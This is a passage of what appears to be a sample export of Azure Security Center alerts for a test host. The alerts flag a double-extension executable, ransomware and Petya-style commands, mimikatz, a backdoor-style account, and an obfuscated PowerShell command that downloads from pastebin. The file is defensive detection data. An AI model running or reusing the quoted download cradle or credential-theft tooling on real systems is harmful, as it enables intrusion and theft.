""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\cmd.exe"",
""Suspicious Command Line"": ""cmd /c echo rundll32.exe perfc.dat"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1888"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Petya\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Petya.pdf?sv=2018-03-28&sr=b&sig=9E83f2V9Ix17hs7kF%2B%2FwVNoEivLC4GV%2FfNgRULmjp4U%3D&spr=https&st=2019-01-15T13:00:23Z&se=2019-04-15T13:15:23Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=40dcc8bf-0478-4f3b-b275-ed0a94f2c013\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1888"",
""CommandLine"": ""cmd /c echo rundll32.exe perfc.dat"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:19.6178083Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:19.6178083Z"",
""EndTimeUtc"": ""2019-01-15T17:15:19.6178083Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:23,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
184,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:17,2019-01-15 17:15:17,e6c85135-2b91-4537-b9a0-dae7eabb8e9d,2518547282825853773_e6c85135-2b91-4537-b9a0-dae7eabb8e9d,Detection,Microsoft,Suspicious double extension file executed,Suspicious double extension file executed,Suspicious double extension file executed,"Analysis of host data indicates an execution of a process with a suspicious double extension.
This extension may trick users into thinking files are safe to be opened and might indicate the presence of malware on the system.",High,False,"{
""domain name"": ""MSTICAlertsWin1"",
""user name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""process name"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""command line"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x104c"",
""account logon id"": ""0x1bd592e"",
""User SID"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""parent process id"": ""0x12bc"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious Double Extensions\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-Double-Extensions.pdf?sv=2018-03-28&sr=b&sig=LJjocPW4cXTziFrh16nRdnR8T6OiQlSXU%2BCqo8xqjyo%3D&spr=https&st=2019-01-15T11:50:23Z&se=2019-04-15T12:05:23Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=0c8d0493-55c3-4b3f-a0b0-c8d4d2ce0343\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""doubleextension.pdf.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x104c"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\doubleextension.pdf.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:17.4146226Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:17.4146226Z"",
""EndTimeUtc"": ""2019-01-15T17:15:17.4146226Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:23,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
185,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:19,2019-01-15 17:15:19,4a524cc8-7613-4c42-93a9-8c1e466a4476,2518547282802847718_4a524cc8-7613-4c42-93a9-8c1e466a4476,Detection,Microsoft,Ransomware indicators detected,Ransomware indicators detected,Ransomware indicators detected,"Analysis of host data indicates suspicious activity traditionally associated with lock-screen and encryption ransomware. Lock screen ransomware displays a full-screen message preventing interactive use of the host and access to its files. Encryption ransomware prevents access by encrypting data files. In both cases a ransom message is typically displayed, requesting payment in order to restore file access.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\ransomware.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\usertmp\\ransomware.exe @ abc.com abc.wallet"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1550"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=xLQr4wf0XrlsMA2ntQVr9F0JYKmrWrDYb054eLfeKhk%3D&spr=https&st=2019-01-15T12:16:41Z&se=2019-04-15T12:31:41Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=0c8d0493-55c3-4b3f-a0b0-c8d4d2ce0343\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""ransomware.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1550"",
""CommandLine"": ""c:\\diagnostics\\usertmp\\ransomware.exe @ abc.com abc.wallet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:19.7152281Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:19.7152281Z"",
""EndTimeUtc"": ""2019-01-15T17:15:19.7152281Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:23,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
186,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:14,2019-01-15 17:15:14,0c3ae402-a9ea-4d5c-9c09-4274b7847c2c,2518547282859754476_0c3ae402-a9ea-4d5c-9c09-4274b7847c2c,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,"Machine logs indicate that the suspicious process: 'c:\diagnostics\usertmp\mimikatz.exe' was running on the machine, often associated with attacker attempts to access credentials.'",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\mimikatz.exe"",
""Suspicious Command Line"": "".\\mimikatz.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x15f4"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""mimikatz.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x15f4"",
""CommandLine"": "".\\mimikatz.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:14.0245523Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:14.0245523Z"",
""EndTimeUtc"": ""2019-01-15T17:15:14.0245523Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:19,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
187,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 17:15:12,2019-01-15 17:15:12,d89d1ab7-e5b7-426c-a98f-eab95deea3ad,2518547282878855119_d89d1ab7-e5b7-426c-a98f-eab95deea3ad,Detection,Microsoft,Detected obfuscated command line.,Detected obfuscated command line.,Detected obfuscated command line.,Attackers use increasingly complex obfuscation techniques to evade detections that run against the underlying data. Analysis of host data on MSTICALERTSWIN1 detected suspicious indicators of obfuscation on the commandline.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""MSTICALERTSWIN1\\MSTICAdmin"",
""Account Session Id"": ""0x1bd592e"",
""Suspicious Process"": ""c:\\diagnostics\\usertmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -command \""(new-object net.webclient).downloadstring(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqcwem17'));\"""",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1134"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x12bc"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAdmin"",
""NTDomain"": ""MSTICAlertsWin1"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-21-996632719-2361334927-4038480536-500"",
""IsDomainJoined"": false,
""Type"": ""account"",
""LogonId"": ""0x1bd592e""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\usertmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1134"",
""CommandLine"": "".\\powershell -command \""(new-object net.webclient).downloadstring(('ht'+'tp://pasteb' + 'bin/'+'raw/'+'pqcwem17'));\"""",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T17:15:12.114488Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x1bd592e"",
""StartTimeUtc"": ""2019-01-15T17:15:12.114488Z"",
""EndTimeUtc"": ""2019-01-15T17:15:12.114488Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 17:15:15,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
188,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 05:15:03,2019-01-15 05:15:03,90beedae-1285-43d6-8f33-16bc542af39b,2518547714966107270_90beedae-1285-43d6-8f33-16bc542af39b,Detection,Microsoft,Anomalous account creation detected,Anomalous account creation detected,Anomalous account creation detected,"Analysis of host data indicates suspicious account creation in your environment.
This activity could either be legitimate activity, or an indication of a compromised host and a backdoor account was installed on the host for persistency purposes.",Medium,False,"{
""Machine Name"": ""MSTICALERTSWIN1"",
""Created Account"": ""adm1nistrator"",
""ActionTaken"": ""Detected"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""2"",
""HostName"": ""msticalertswin1"",
""AzureID"": ""/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1"",
""OMSAgentID"": ""46fe7078-61bb-4bed-9430-7ac01d91c273"",
""Type"": ""host""
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 22:46:37,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,